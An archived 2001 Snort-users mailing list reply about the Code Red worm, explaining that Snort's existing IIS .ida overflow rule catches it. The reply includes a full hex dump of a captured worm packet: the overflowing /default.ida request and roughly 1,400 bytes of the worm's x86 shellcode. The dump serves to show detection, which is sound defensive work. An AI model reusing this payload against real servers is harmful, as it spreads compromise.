Snort mailing list archives

Previous By Date Next
Previous By Thread Next

RE: code red worm

From: Steve Halligan <agent33 () geeksquad com>
Date: Mon, 30 Jul 2001 11:12:04 -0500



If I'm not mistaken, there is a rule to detect the worm.  The 
worm attempts to 
exploit the Microsoft ida buffer overflow for which there has 
been a rule since 
June 19.


You are correct sir.  Snort=way way ahead of the game on code red.  It was
detecting it before it existed.

This is what it looks like in its scanning phase:

#(1 - 720) [2001-07-19 13:37:57] [arachNIDS/552]  WEB-IIS ISAPI .ida attempt
IPv4: 208.135.72.10 -> xxx.xxx.xxx.227
      hlen=5 TOS=0 dlen=1500 ID=1239 flags=0 offset=0 TTL=116 chksum=14626
TCP:  port=1783 -> dport: 80  flags=***AP*** seq=3986198013
      ack=1738783906 off=5 res=0 win=17520 urp=0 chksum=24758
Payload:  length = 1414

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   N.090.858.bd3.80
100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
120 : 31 00 30 39 30 00 30 39 30 00 31 39 30 00 30 63   1.090.090.190.0c
130 : 33 00 30 30 33 00 62 30 30 00 33 31 62 00 33 66   3.003.b00.31b.3f
140 : 66 00 30 37 38 00 30 30 30 00 30 3D 61 20 20 48   f.078.000.0=a  H
150 : 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74   TTP/1.0..Content
160 : 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A   -type: text/xml.
170 : 48 4F 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F   HOST:www.worm.co
180 : 6D 0A 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43   m. Accept: */*.C
190 : 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33   ontent-length: 3
1a0 : 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00   569 ....U.......
1b0 : 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8   .SVW............
1c0 : CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00   ........p.......
1d0 : E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF   .......h........
1e0 : FF 64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00   .d......G.d.=...
1f0 : 00 E9 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE   ..o.....`.......
200 : FF FF FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89   ........h.......
210 : 85 F4 FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8   .......X......w.
220 : 9B 0A 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00   ......p.........
230 : 00 8B 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58   ...X...........X
240 : FE FF FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7   .....X......xu..
250 : 85 58 FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33   .X.........X...3
260 : C0 66 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B   .f..=MZ.........
270 : 8D 58 FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9   .X....Q&lt;..X...3.
280 : 66 8B 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00   f.....PE....y...
290 : 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B   ..X....B&lt;..X....
2a0 : 54 01 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B   T.x..X.....T....
2b0 : 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D   .T....H...X.....
2c0 : 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E   L.....L....:KERN
2d0 : 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45   ..3.....L....x.E
2e0 : 4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89   L32.. .....X....
2f0 : 8D 34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF   .4.....T.....X..
300 : FF 03 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF   ..B ..L.....H...
310 : 00 00 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89   ........H.......
320 : 8D 48 FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95   .H.....L........
330 : 4C FE FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF   L.....T.....H...
340 : 3B 48 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B   ;H.........L....
350 : 02 8B 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85   ...X....&lt;.GetP..
360 : A0 00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE   ......L.......X.
370 : FF FF 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00   ...|..rocA......
380 : 8B 95 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE   ..H.....H.....X.
390 : FF FF 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04   ....T....H$3.f..
3a0 : 0A 89 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10   ...L.....T....Q.
3b0 : 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF   ..L....L....L...
3c0 : 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE   ..L.....L.....L.
3d0 : FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85   ....L.....X.....
3e0 : 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF   T....H......L...
3f0 : 8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE   ..L.....X.....p.
400 : FF FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD   ................
410 : F0 FE FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70   .....G.d.......p
420 : FE FF FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF   ....u..8.....L..
430 : FF 01 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01   .........L......
440 : 89 8D 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85   ..L.....h.......
450 : C0 0F 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11   .........h......
460 : 83 FA 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4   ...u!..h........
470 : 50 FF 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85   P......;..CKCK..
480 : 34 FE FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B   4....*....h...Q.
490 : 95 34 FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43   .4...R..p...;..C
4a0 : 4B 43 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF   KCK..L..........
4b0 : EB 0F 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF   ....h........h..
4c0 : FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2   ...h........t...
4d0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9   ..h........h....
4e0 : 53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68   S.....h........h
4f0 : FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE   ....M.........l.
500 : FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE   ....L...........
510 : FF FF 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE   ..h.E...........
520 : FF FF 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90   ..[SS.......cx..
530 : 8B 4D 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE   .M..Q...P.....P.
540 : FF FF 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50   ...u&amp;..j...L...P
550 : 8B 8D 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95   ..h...Q.U..B.P..
560 : 6C FE FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF   l...;..CKCK..P..
570 : FF 64 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50   .d}\..P........P
580 : FE FF FF 8B 95 50                                 .....P
----------------------------------------------------------------------------
--

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: